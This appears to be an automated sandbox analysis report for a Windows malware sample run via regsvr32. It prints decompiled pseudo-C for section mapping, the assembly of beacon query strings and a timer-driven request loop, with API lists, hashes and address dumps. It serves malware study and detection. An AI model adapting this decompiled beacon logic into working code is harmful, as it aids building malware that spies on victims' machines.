                                                                                                                                                                                                                                    • Opcode ID: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                                                                                                                                                                                                    • Instruction ID: b6354e8d599e187b35d57fe35b05ac32902bafa565a033ddf4af7008bb975c43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23210BB1D0020DAFDB11DFA9C8849EEFBF9EB48354F108469E615F3210D7709A498B64
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                    			E026D1D9F(void** __esi, PVOID* _a4) {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				long _t13;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                    				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                                                                                                                    				if(_t13 < 0) {
                                                                                                                                                                                                                                    					_push(_t13);
                                                                                                                                                                                                                                    					return __esi[6]();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,026D1F27,00000002,00000000,?,?,00000000,?,?,026D1F27,00000002), ref: 026D1DCC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: SectionView
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1323581903-0
                                                                                                                                                                                                                                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                    • Instruction ID: 60242d72cacc72b8b5d41660c6166a99184d30469634c887c0b9de140eb21b6d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0F012B590420CBFDB119FA5CC85C9FBBBDEB45258B104979B152E1090D6709E098A60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E023E8B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				long _t59;
                                                                                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                    				int _t71;
                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                    				intOrPtr _t82;
                                                                                                                                                                                                                                    				intOrPtr _t86;
                                                                                                                                                                                                                                    				intOrPtr* _t88;
                                                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                                                                                                    				signed int _t105;
                                                                                                                                                                                                                                    				char** _t107;
                                                                                                                                                                                                                                    				int _t110;
                                                                                                                                                                                                                                    				signed int _t112;
                                                                                                                                                                                                                                    				intOrPtr* _t113;
                                                                                                                                                                                                                                    				intOrPtr* _t115;
                                                                                                                                                                                                                                    				intOrPtr* _t117;
                                                                                                                                                                                                                                    				intOrPtr* _t119;
                                                                                                                                                                                                                                    				intOrPtr _t122;
                                                                                                                                                                                                                                    				intOrPtr _t127;
                                                                                                                                                                                                                                    				int _t131;
                                                                                                                                                                                                                                    				CHAR* _t133;
                                                                                                                                                                                                                                    				intOrPtr _t134;
                                                                                                                                                                                                                                    				void* _t135;
                                                                                                                                                                                                                                    				void* _t144;
                                                                                                                                                                                                                                    				int _t145;
                                                                                                                                                                                                                                    				void* _t146;
                                                                                                                                                                                                                                    				intOrPtr _t147;
                                                                                                                                                                                                                                    				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x23ed018; // 0x99d5691b
				asm("bswap eax");
				_t61 =  *0x23ed014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0x23ed010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x23ed00c; // 0x62819102
				asm("bswap eax");
				_t64 =  *0x23ed27c; // 0x28da5a8
				_t3 = _t64 + 0x23ee633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x23ed02c,  *0x23ed004, _t59);
				_t67 = E023E1C1A();
				_t68 =  *0x23ed27c; // 0x28da5a8
				_t4 = _t68 + 0x23ee673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E023E54BC(_t135); // executed
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0x23ed27c; // 0x28da5a8
					_t7 = _t127 + 0x23ee8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0x23ed238, 0, _v8);
				}
				_t73 = E023E7649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0x23ed27c; // 0x28da5a8
					_t11 = _t122 + 0x23ee8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0x23ed238, 0, _v8);
				}
				_t147 =  *0x23ed32c; // 0x4cc95b0
				_t75 = E023E9395(0x23ed00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x23ed238, _t153, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x23ed238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x23ed238, _t153, _v20);
						goto L26;
					}
					E023E7A80(GetTickCount());
					_t82 =  *0x23ed32c; // 0x4cc95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x23ed32c; // 0x4cc95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x23ed32c; // 0x4cc95b0
					_t149 = E023E8307(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						HeapFree( *0x23ed238, _t153, _v8);
						goto L25;
					}
					StrTrimA(_t149, 0x23ec2ac);
					_push(_t149);
					_t94 = E023E3CC8();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x23ed238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E023E809F(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E023EA1B0();
						L22:
						HeapFree( *0x23ed238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E023E43DF(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_t112 = E023E163F(_t158, _a4, _a8, _a12); // executed
						_v12 = _t112;
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E023E9039(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E023E85DB(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E023E9039(_a4);
                                                                                                                                                                                                                                    							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                                                                                                                    								goto L22;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x023e8df2
                                                                                                                                                                                                                                    0x023e8df7
                                                                                                                                                                                                                                    0x023e8dfc
                                                                                                                                                                                                                                    0x023e8e09
                                                                                                                                                                                                                                    0x023e8e11
                                                                                                                                                                                                                                    0x023e8e14
                                                                                                                                                                                                                                    0x023e8e14
                                                                                                                                                                                                                                    0x023e8df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8ddb
                                                                                                                                                                                                                                    0x023e8ddf
                                                                                                                                                                                                                                    0x023e8e16
                                                                                                                                                                                                                                    0x023e8e19
                                                                                                                                                                                                                                    0x023e8e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8e22
                                                                                                                                                                                                                                    0x023e8de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8de1
                                                                                                                                                                                                                                    0x023e8dd9

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 023E8BA8
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023E8BF8
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023E8C15
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023E8C41
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 023E8C53
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023E8C74
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 023E8C84
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 023E8CB2
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 023E8CC3
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(04CC9570), ref: 023E8CD7
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(04CC9570), ref: 023E8CF5
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,023EA428,?,04CC95B0), ref: 023E8332
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: lstrlen.KERNEL32(?,?,?,023EA428,?,04CC95B0), ref: 023E833A
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: strcpy.NTDLL ref: 023E8351
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: lstrcat.KERNEL32(00000000,?), ref: 023E835C
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,023EA428,?,04CC95B0), ref: 023E8379
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,023EC2AC,?,04CC95B0), ref: 023E8D2C
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrlen.KERNEL32(04CC87FA,00000000,00000000,73FCC740,023EA453,00000000), ref: 023E3CD8
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrlen.KERNEL32(?), ref: 023E3CE0
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrcpy.KERNEL32(00000000,04CC87FA), ref: 023E3CF4
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrcat.KERNEL32(00000000,?), ref: 023E3CFF
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 023E8D4D
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 023E8D55
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 023E8D63
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 023E8D69
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: lstrlen.KERNEL32(?,00000000,023ED330,00000001,023E2200,023ED00C,023ED00C,00000000,00000005,00000000,00000000,?,?,?,023E96C1,023E23E9), ref: 023E80A8
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: mbstowcs.NTDLL ref: 023E80CF
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: memset.NTDLL ref: 023E80E1
                                                                                                                                                                                                                                    • wcstombs.NTDLL ref: 023E8DFC
                                                                                                                                                                                                                                      • Part of subcall function 023E163F: SysAllocString.OLEAUT32(?), ref: 023E1680
                                                                                                                                                                                                                                      • Part of subcall function 023E163F: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 023E1702
                                                                                                                                                                                                                                      • Part of subcall function 023E163F: StrStrIW.SHLWAPI(?,006E0069), ref: 023E1741
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?), ref: 023E8E3D
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 023E8E49
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,04CC95B0), ref: 023E8E55
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 023E8E61
                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?), ref: 023E8E6D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 603507560-0
                                                                                                                                                                                                                                    • Opcode ID: 74435c078f77b571f571a78e0128cfa777ca4978a8d1b777363e9d1d0b032063
                                                                                                                                                                                                                                    • Instruction ID: e368e5e2653bd0d454932b50b7f77489409208b0f4b3c8b9388bd93b7d0f1705
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74435c078f77b571f571a78e0128cfa777ca4978a8d1b777363e9d1d0b032063
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C09115B1D40218EFCF21AFA4DC84A9E7BBDAF48354F144855F8099B2A0D731E969DB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 97 23e6786-23e67b2 memset CreateWaitableTimerA 98 23e67b8-23e6808 _allmul SetWaitableTimer WaitForMultipleObjects 97->98 99 23e6913-23e6919 GetLastError 97->99 101 23e680a-23e680d 98->101 102 23e6883-23e6888 98->102 100 23e691c-23e6923 99->100 103 23e680f call 23e73fd 101->103 104 23e6818 101->104 105 23e6889-23e688d 102->105 110 23e6814-23e6816 103->110 109 23e6822 104->109 107 23e688f-23e6897 HeapFree 105->107 108 23e689d-23e68a1 105->108 107->108 108->105 111 23e68a3-23e68ac CloseHandle 108->111 112 23e6825-23e6829 109->112 110->104 110->109 111->100 113 23e683b-23e6864 call 23e8504 112->113 114 23e682b-23e6832 112->114 118 23e68ae-23e68b3 113->118 119 23e6866-23e686f 113->119 114->113 115 23e6834 114->115 115->113 121 23e68b5-23e68bb 118->121 122 23e68d2-23e68da 118->122 119->112 120 23e6871-23e6880 call 23e3bf1 119->120 120->102 121->102 125 23e68bd-23e68d0 call 23ea1b0 121->125 123 23e68e0-23e6908 _allmul SetWaitableTimer WaitForMultipleObjects 122->123 123->112 127 23e690e 123->127 125->123 127->102
                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                    			E023E6786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				struct %anon52 _v8;
                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				union _LARGE_INTEGER _v36;
                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                    				void _v88;
                                                                                                                                                                                                                                    				char _v92;
                                                                                                                                                                                                                                    				struct %anon52 _t46;
                                                                                                                                                                                                                                    				intOrPtr _t51;
                                                                                                                                                                                                                                    				long _t53;
                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                    				struct %anon52 _t60;
                                                                                                                                                                                                                                    				long _t64;
                                                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                                                    				void** _t78;
                                                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t73 = __edx;
                                                                                                                                                                                                                                    				_v92 = 0;
                                                                                                                                                                                                                                    				memset( &_v88, 0, 0x2c);
                                                                                                                                                                                                                                    				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                                                                                                                    				_v44 = _t46;
                                                                                                                                                                                                                                    				if(_t46 == 0) {
                                                                                                                                                                                                                                    					_v8.LowPart = GetLastError();
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_push(0xffffffff);
                                                                                                                                                                                                                                    					_push(0xff676980);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push( *0x23ed240);
                                                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                    					L023EB0C8();
                                                                                                                                                                                                                                    					_v36.LowPart = _t46;
                                                                                                                                                                                                                                    					_v32 = _t73;
                                                                                                                                                                                                                                    					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                                                                                                                                    					_t51 =  *0x23ed26c; // 0x2cc
                                                                                                                                                                                                                                    					_v40 = _t51;
                                                                                                                                                                                                                                    					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                    					_v8.LowPart = _t53;
                                                                                                                                                                                                                                    					if(_t53 == 0) {
                                                                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                                                    							 *0x23ed24c = 5;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t68 = E023E73FD(_t73); // executed
                                                                                                                                                                                                                                    							if(_t68 != 0) {
                                                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						if(_v12 == 1 && ( *0x23ed260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    							_v12 = 2;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t71 = _v12;
                                                                                                                                                                                                                                    						_t58 = _t71 << 4;
                                                                                                                                                                                                                                    						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                                                                                                                                                                                                    						_t72 = _t71 + 1;
                                                                                                                                                                                                                                    						_v24 = _t71 + 1;
                                                                                                                                                                                                                                    						_t60 = E023E8504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                                                                                                                                                                                                                    						_v8.LowPart = _t60;
                                                                                                                                                                                                                                    						if(_t60 != 0) {
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t65 = _v24;
                                                                                                                                                                                                                                    						_t90 = _t65 - 3;
                                                                                                                                                                                                                                    						_v12 = _t65;
                                                                                                                                                                                                                                    						if(_t65 != 3) {
                                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v8.LowPart = E023E3BF1(_t72, _t90,  &_v92, _a4, _a8);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						__eflags = _t60 - 0x10d2;
                                                                                                                                                                                                                                    						if(_t60 != 0x10d2) {
                                                                                                                                                                                                                                    							_push(0xffffffff);
                                                                                                                                                                                                                                    							_push(0xff676980);
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push( *0x23ed244);
                                                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							__eflags =  *0x23ed248; // 0x0
                                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t60 = E023EA1B0();
                                                                                                                                                                                                                                    								_push(0xffffffff);
                                                                                                                                                                                                                                    								_push(0xdc3cba00);
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_push( *0x23ed248);
                                                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                                                    								L023EB0C8();
                                                                                                                                                                                                                                    								_v36.LowPart = _t60;
                                                                                                                                                                                                                                    								_v32 = _t76;
                                                                                                                                                                                                                                    								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                    								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                    								__eflags = _t64;
                                                                                                                                                                                                                                    								_v8.LowPart = _t64;
                                                                                                                                                                                                                                    								if(_t64 == 0) {
                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					_t78 =  &_v92;
                                                                                                                                                                                                                                    					_t70 = 3;
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t54 =  *_t78;
                                                                                                                                                                                                                                    						if(_t54 != 0) {
                                                                                                                                                                                                                                    							HeapFree( *0x23ed238, 0, _t54);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t78 =  &(_t78[4]);
                                                                                                                                                                                                                                    						_t70 = _t70 - 1;
                                                                                                                                                                                                                                    					} while (_t70 != 0);
                                                                                                                                                                                                                                    					CloseHandle(_v44);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                    				goto L25;
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    0x023e6818
                                                                                                                                                                                                                                    0x023e680f
                                                                                                                                                                                                                                    0x023e680f
                                                                                                                                                                                                                                    0x023e6816
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e6816
                                                                                                                                                                                                                                    0x023e6822
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e6825
                                                                                                                                                                                                                                    0x023e6829
                                                                                                                                                                                                                                    0x023e6834
                                                                                                                                                                                                                                    0x023e6834
                                                                                                                                                                                                                                    0x023e683b
                                                                                                                                                                                                                                    0x023e6844
                                                                                                                                                                                                                                    0x023e684b
                                                                                                                                                                                                                                    0x023e6854
                                                                                                                                                                                                                                    0x023e6857
                                                                                                                                                                                                                                    0x023e685a
                                                                                                                                                                                                                                    0x023e6861
                                                                                                                                                                                                                                    0x023e6864
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e6866
                                                                                                                                                                                                                                    0x023e6869
                                                                                                                                                                                                                                    0x023e686c
                                                                                                                                                                                                                                    0x023e686f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e6871
                                                                                                                                                                                                                                    0x023e6880
                                                                                                                                                                                                                                    0x023e6880
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e68ae
                                                                                                                                                                                                                                    0x023e68ae
                                                                                                                                                                                                                                    0x023e68b3
                                                                                                                                                                                                                                    0x023e68d2
                                                                                                                                                                                                                                    0x023e68d4
                                                                                                                                                                                                                                    0x023e68d9
                                                                                                                                                                                                                                    0x023e68da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e68b5
                                                                                                                                                                                                                                    0x023e68b5
                                                                                                                                                                                                                                    0x023e68bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e68bd
                                                                                                                                                                                                                                    0x023e68bd
                                                                                                                                                                                                                                    0x023e68c2
                                                                                                                                                                                                                                    0x023e68c4
                                                                                                                                                                                                                                    0x023e68c9
                                                                                                                                                                                                                                    0x023e68ca
                                                                                                                                                                                                                                    0x023e68e0
                                                                                                                                                                                                                                    0x023e68e0
                                                                                                                                                                                                                                    0x023e68e8
                                                                                                                                                                                                                                    0x023e68f3
                                                                                                                                                                                                                                    0x023e68f6
                                                                                                                                                                                                                                    0x023e6901
                                                                                                                                                                                                                                    0x023e6903
                                                                                                                                                                                                                                    0x023e6905
                                                                                                                                                                                                                                    0x023e6908
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e690e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e690e
                                                                                                                                                                                                                                    0x023e6908
                                                                                                                                                                                                                                    0x023e68bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e68b3
                                                                                                                                                                                                                                    0x023e6883
                                                                                                                                                                                                                                    0x023e6885
                                                                                                                                                                                                                                    0x023e6888
                                                                                                                                                                                                                                    0x023e6889
                                                                                                                                                                                                                                    0x023e6889
                                                                                                                                                                                                                                    0x023e688d
                                                                                                                                                                                                                                    0x023e6897
                                                                                                                                                                                                                                    0x023e6897
                                                                                                                                                                                                                                    0x023e689d
                                                                                                                                                                                                                                    0x023e68a0
                                                                                                                                                                                                                                    0x023e68a0
                                                                                                                                                                                                                                    0x023e68a6
                                                                                                                                                                                                                                    0x023e68a6
